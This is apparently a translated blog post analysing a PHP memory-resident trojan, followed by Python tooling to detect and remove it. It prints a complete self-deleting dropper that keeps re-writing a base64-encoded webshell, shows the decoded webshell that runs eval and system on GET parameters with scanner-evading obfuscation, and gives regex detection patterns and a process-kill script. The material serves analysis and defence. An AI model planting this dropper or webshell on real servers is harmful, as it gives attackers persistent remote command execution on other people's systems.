Analyzing how a PHP memory-resident Trojan works

藏色散人
Release: 2023-04-11 08:14:01

Preface

A memory-resident Trojan is malicious code that keeps running in memory without a file on disk. Such Trojans are well hidden, hard to detect and hard to kill (commonly known as an "immortal horse").

Network security has a strong barrel effect: a system's defence is only as strong as its weakest link. In the contest between black hats and white hats, the outcome depends on the attacker's skill and on how well the attack is concealed and how much damage it does.

This article does not discuss how the malicious code reached the production server, whether through an arbitrary file upload or a near-source attack.

Virus source code (very simple)

<?php
// Keep the script from timing out, and keep running if the client disconnects
set_time_limit(0);ignore_user_abort(true);
// Delete the script's own file from disk; the already-running process stays in memory
@unlink(__FILE__);
// Give the dropped Trojan a misleading, innocent-looking name
$file = './getUserInfo.php';
// Infinite loop that stays resident in memory and re-drops the Trojan file whenever it is missing
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
 // Check once a minute
 sleep(60);
}

The dropped virus body (the decoded base64 string above)

<?php
// The following code disguises the eval keyword and the system function
// Equivalent to: eval($_GET['e']);
if($e = @$_GET['e']) {
    // base64_decode('ZXZhbCgi') is 'eval("' and base64_decode('Iik7') is '");'
    // Note: create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this branch only works on older PHP
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}
// Equivalent to: system($_GET['s']);
if($s = @$_GET['s']) {
    // Removing every 'x' leaves the string 'system', which is then invoked as a variable function
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}

Notes

  • The sensitive code above (eval and system) is encoded so that it evades common security scans.

  • Once the sample runs, it deletes its own file and stays resident in memory for a long time.

  • Even if the dropped Trojan file is detected and deleted, the loop writes the same file again on its next iteration (within a minute, given sleep(60)).
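The "encoded to avoid security scans" point above is exactly what a content scanner has to counter: look through base64_decode() literals and str_replace()-built names instead of matching only on the bare words eval and system. The following scanner is an added example written for this article, not code from the original post or from learnku.com. The indicator names, the sample strings (the page's own dropper and dropped body, re-assembled here as scanner input, plus a constructed benign file) and the recursion depth are assumptions of this example.

```python
import base64
import re

# Patterns the sample on this page relies on. Each is a regex over PHP source text.
INDICATORS = {
    # a function body assembled from base64_decode() pieces and handed to create_function()
    "create_function_with_base64": re.compile(
        r"create_function\s*\(.*?base64_decode\s*\(", re.S),
    # a callable name built with str_replace() and then invoked as $name(...)
    "str_replace_built_callable": re.compile(
        r"\$(\w+)\s*=\s*str_replace\s*\(.*?\)\s*;.*?\$\1\s*\(", re.S),
    # the script deletes its own file
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
    # an endless loop that keeps writing a file
    "resident_loop_with_dropper": re.compile(
        r"while\s*\(\s*true\s*\).*?file_put_contents", re.S),
}

# base64 string literal passed directly to base64_decode()
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# str_replace() whose three arguments are all single-quoted literals
STR_REPLACE_LITERAL = re.compile(
    r"str_replace\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*,\s*'([^']*)'\s*\)")


def _decode_literal(literal: str):
    """Decode one base64 literal to text, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(src: str, max_depth: int = 3) -> dict:
    """Return {indicator: layer} for every indicator found in src or inside any
    base64 literal it embeds. Layer 0 is the file itself, 1 the first decoded layer."""
    hits = {}

    def walk(text, depth):
        for name, rx in INDICATORS.items():
            if name not in hits and rx.search(text):
                hits[name] = depth
        if depth >= max_depth:
            return
        for m in B64_LITERAL.finditer(text):
            decoded = _decode_literal(m.group(1))
            if decoded is not None:
                walk(decoded, depth + 1)

    walk(src, 0)
    return hits


def reveal(src: str) -> dict:
    """Map each base64 literal passed to base64_decode() to its decoded text."""
    out = {}
    for m in B64_LITERAL.finditer(src):
        decoded = _decode_literal(m.group(1))
        if decoded is not None:
            out[m.group(1)] = decoded
    return out


def resolve_str_replace(src: str) -> list:
    """Evaluate str_replace() calls with literal arguments to expose built names."""
    return [hay.replace(needle, repl)
            for needle, repl, hay in STR_REPLACE_LITERAL.findall(src)]


# Sample inputs (constructed for this example): the dropped body from the page, the
# dropper from the page re-assembled around it, and a harmless file using base64_decode().
DROPPED_BODY = """<?php
if($e = @$_GET['e']) {
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}
if($s = @$_GET['s']) {
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}
"""
DROPPER = ("<?php\nset_time_limit(0);ignore_user_abort(true);\n@unlink(__FILE__);\n"
           "$file = './getUserInfo.php';\nwhile(true) {\n if(! file_exists($file)) "
           "@file_put_contents($file, base64_decode('%s'));\n sleep(60);\n}\n"
           % base64.b64encode(DROPPED_BODY.encode()).decode())
BENIGN = "<?php\necho base64_decode('aGVsbG8=');\n"

if __name__ == "__main__":
    for label, sample in (("dropper", DROPPER), ("dropped body", DROPPED_BODY), ("benign", BENIGN)):
        print(label, scan(sample), reveal(sample), resolve_str_replace(sample))
```

Running the block reports the self-delete and resident loop at layer 0 of the dropper, the create_function and str_replace indicators one base64 layer below, the literals decoding to eval(" and "); and the rebuilt name system, while the benign file produces no hits.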

Solution

Kill the resident process first, then delete the dropped Trojan file. Deleting the file alone is not enough, because the loop in memory recreates it on its next iteration.
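Because the dropper unlinks its own file, the resident process is one whose command line still names a script that no longer exists on disk. The following triage helper is an added example for this article, not code from the original post; it is an assumption of this example that the sample was started by the php command-line binary (a php-fpm worker does not carry the script path in its argv, so it needs another signal such as a request running far longer than the pool's timeout). Function names, the /proc layout on Linux and the 90-second settle time are this example's choices.

```python
import os
import signal
import time


def parse_cmdline(raw: bytes) -> list:
    """Split a /proc/<pid>/cmdline blob (NUL-separated) into an argv list."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def script_argument(argv: list):
    """Return the script file a php CLI invocation was started with, or None when the
    process is not php, runs inline code (-r), or names no script at all."""
    if not argv or not os.path.basename(argv[0]).startswith("php"):
        return None
    args = argv[1:]
    i = 0
    while i < len(args):
        a = args[i]
        if a == "-r":                # inline code, nothing on disk to check
            return None
        if a == "-f":                # explicit script file
            return args[i + 1] if i + 1 < len(args) else None
        if a in ("-c", "-d"):        # options that consume the next argument
            i += 2
            continue
        if a.startswith("-"):        # any other flag
            i += 1
            continue
        return a                     # first bare argument is the script
    return None


def script_is_missing(argv: list, exists=os.path.exists):
    """True if the php process's script has vanished from disk (the dropper's
    @unlink(__FILE__) leaves exactly this trace), False if present, None if n/a."""
    script = script_argument(argv)
    if script is None:
        return None
    return not exists(script)


def find_orphaned_php(proc_root: str = "/proc") -> list:
    """Walk /proc and return [(pid, script)] for php processes whose script is gone."""
    hits = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "cmdline"), "rb") as fh:
                argv = parse_cmdline(fh.read())
        except OSError:              # process exited or not readable
            continue
        if script_is_missing(argv):
            hits.append((int(pid), script_argument(argv)))
    return hits


def respond(pid: int, dropped_file: str, dry_run: bool = True, settle_seconds: int = 90) -> list:
    """Kill the resident process first, then remove the dropped file, then wait longer
    than the dropper's sleep(60) and confirm the file has not come back."""
    if dry_run:
        return [f"would kill pid {pid}", f"would remove {dropped_file}"]
    actions = []
    os.kill(pid, signal.SIGKILL)
    actions.append(f"killed pid {pid}")
    try:
        os.remove(dropped_file)
        actions.append(f"removed {dropped_file}")
    except FileNotFoundError:
        actions.append(f"{dropped_file} already absent")
    time.sleep(settle_seconds)
    actions.append("recreated" if os.path.exists(dropped_file) else "not recreated")
    return actions


if __name__ == "__main__":
    for pid, script in find_orphaned_php():
        print(f"pid {pid} is running a php script that no longer exists: {script}")
        print(respond(pid, "./getUserInfo.php", dry_run=True))
```

The order in respond() is the point of the article's solution: removing the file while the loop is still alive only buys a minute, so the process goes first and the final check confirms the loop is really dead.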

source:learnku.com